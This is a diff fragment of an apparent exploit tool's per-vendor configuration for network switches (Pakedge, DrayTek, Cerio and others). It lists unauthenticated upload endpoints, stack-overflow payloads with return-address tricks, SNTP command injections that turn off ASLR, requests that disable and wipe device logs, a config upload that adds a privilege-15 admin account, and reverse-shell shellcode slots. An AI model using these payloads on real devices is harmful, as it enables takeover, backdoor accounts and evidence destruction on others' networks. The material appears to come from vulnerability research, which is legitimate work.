+				'info_leak_JSON':False,
+				'info_leak_uri':'',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':False,
+					'encryption':'clear',
+					'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+					'query':'username=USERNAME&password=PASSWORD&login=1',
+					'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
+					'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':False,
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'LOGGING_SERVICE=0&cmd=5121',
+						'status':'',
+						'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logfile_query':'cmd_5132=Clear+file+messages',
+						'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': {
+						'httpuploadbakcfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadbakcfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadruncfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httprestorecfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'Image Signature Error',
+							'vulnerable': True,
+							'safe': True
+						},
+						'dispatcher.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'json':False,
+						'authenticated': False,
+						'encryption':'md5',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
+						'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
+						'del_query':'', 
+						'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':False,
+						'authenticated': True,
+						'enable_uri':'/cgi-bin/dispatcher.cgi',
+						'enable_query':'sntp_enable=1&cmd=548',
+						'status_uri':'',
+						'inject_uri':'/cgi-bin/dispatcher.cgi',
+						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
+						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
+						'delete_uri':'/cgi-bin/dispatcher.cgi',
+						'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'sntp_enable=0&cmd=548',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',
+						'sys_ping_post_check':'',
+						'sys_ping_post_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
+
+						'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'',						# Clean RAM log CMD
+						'log_ramClear_SIGSEGV':False,				# Clean RAM log SIGSEGV ?
+
+						'log_fileClear_cmd':'',						# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':False,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
+
+						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
+						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
+
+						'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
+
+						'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
+						'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
+						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': False,
+						'safe': True
+					}, 
+
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+						'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
+						'workaround':True,	# My LAB workaround
+						'stack':True, # False = use Heap, and there are no ASLR
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Pakedge': { 
+				'vendor': 'Pakedgedevice & Software Inc',
+				'uri':'https://www.pakedge.com/products/switches/family/index.php',
+				'modulus_uri':'/cgi/get.cgi?cmd=home_login',
+				'info_leak':True,
+				'info_leak_JSON':True,
+				'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
+				'xsid':False,
+				'xsid_uri':'/cgi/get.cgi?cmd=home_main',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'rsa',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
+					'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
+					'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'/cgi/set.cgi?cmd=log_global',
+						'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
+						'status':'/cgi/get.cgi?cmd=log_global',
+						'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
+						'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadruncfg.cgi',
+							'check_uri':'/tmp/http_saverun_cfg',
+							'content':'/var/config/running-config',
+							'content_check':'/var/config/running-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httprestorecfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/mnt/startup-config',
+							'content_check':'/mnt/startup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'/tmp/http_uploadfail',
+							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
+							'content_check':'Copy: Illegal software format',
+							'vulnerable': True,
+							'safe': True
+						},
+						'login.cgi': {
+							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
+							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
+							'content_check':'2',
+							'vulnerable': True,
+							'safe': True
+						},
+						'set.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'clear',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
+						'add_uri':'/cgi/httpuploadruncfg.cgi',
+						'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
+						'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,
+						'enable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_time',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_time',
+						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
+						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_time',
+						'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {	# Not vulnerable 
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
+						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',
+						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',
+
+						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+						'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
+						'stack':True, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'DrayTek': { 
+				'vendor': 'DrayTek Corp.',
+				'modulus_uri':'/cgi/get.cgi?cmd=home_login',
+				'info_leak': True,
+				'info_leak_JSON':True,
+				'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
+				'xsid':False,
+				'xsid_uri':'/cgi/get.cgi?cmd=home_main',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'rsa',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
+					'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
+					'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'/cgi/set.cgi?cmd=log_global',
+						'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
+						'status':'/cgi/get.cgi?cmd=log_global',
+						'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
+						'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadruncfg.cgi',
+							'check_uri':'/tmp/http_saverun_cfg',
+							'content':'/var/config/running-config',
+							'content_check':'/var/config/running-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httprestorecfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/mnt/startup-config',
+							'content_check':'/mnt/startup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'/tmp/http_uploadfail',
+							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
+							'content_check':'Copy: Illegal software format',
+							'vulnerable': True,
+							'safe': True
+						},
+						'login.cgi': {
+							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
+							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
+							'content_check':'1',
+							'vulnerable': True,
+							'safe': True
+						},
+						'set.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
+						'json':True,
+						'encryption':'clear',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
+						'add_uri':'/cgi/httpuploadruncfg.cgi',
+						'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
+						'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,
+						'enable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_time',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_time',
+						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
+						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
+						'delete_uri':'/cgi/set.cgi?cmd=sys_time',
+						'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {	# Not vulnerable 
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
+						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
+						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',
+
+						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+						'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
+						'stack':True, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Cerio': { 
+				'vendor': 'CERIO Corp.',
+				'modulus_uri':'/cgi/get.cgi?cmd=home_login',
+				'info_leak': False,
+				'info_leak_JSON':True,
+				'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
+				'xsid':False,
+				'xsid_uri':'/cgi/get.cgi?cmd=home_main',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':True,
+					'encryption':'rsa',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
+					'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
+					'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':True,
+						'disable_uri':'/cgi/set.cgi?cmd=log_global',
+						'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
+						'status':'/cgi/get.cgi?cmd=log_global',
+						'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
+						'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
+						'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': { 
+						'httpuploadbakcfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadbakcfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/mntlog/startup-config',			# /mntlog instead of /mnt to verify
+							'content_check':'/mntlog/startup-config',	# /mntlog instead of /mnt to verify
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httpuploadruncfg.cgi',
+							'check_uri':'/tmp/http_saverun_cfg',
+							'content':'/var/config/running-config',
+							'content_check':'/var/config/running-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi/httprestorecfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/mnt/startup-config',
+							'content_check':'/mnt/startup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'/tmp/http_uploadfail',
+							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
+							'content_check':'Copy: Illegal software format',
+							'vulnerable': True,
+							'safe': True
+						},
+						'login.cgi': {
+							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
+							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
+							'content_check':'1',
+							'vulnerable': True,
+							'safe': True
+						},
+						'set.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'authenticated': False,
